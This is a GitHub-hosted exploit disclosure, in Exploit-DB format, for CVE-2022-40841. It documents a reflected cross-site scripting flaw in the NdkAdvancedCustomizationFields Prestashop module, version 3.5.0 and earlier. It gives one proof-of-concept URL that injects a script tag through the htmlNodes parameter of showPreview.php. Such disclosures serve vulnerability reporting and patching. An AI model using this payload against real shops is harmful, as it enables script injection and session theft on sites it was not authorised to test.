Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
# Exploit Title: NdkAdvancedCustomizationFields Prestashop module <= 3.5.0 Reflected cross site scripting (xss)
# Date: 01-11-2022
# Exploit Author: dalii
# Vendor Homepage: https://www.ndk-design.fr/
# Software Link : https://www.ndk-design.fr/documentation-ndkadvancedcustomizationfields-prestashop-english
# Version: 3.5.0
# Tested on: Windows 10
# CVE: CVE-2022-40841
Parameters: htmlNodes
Exploit:
http://localhost/modules/ndk_advanced_custom_fields/showPreview.php?htmlNodes=<script>alert('xss')</script>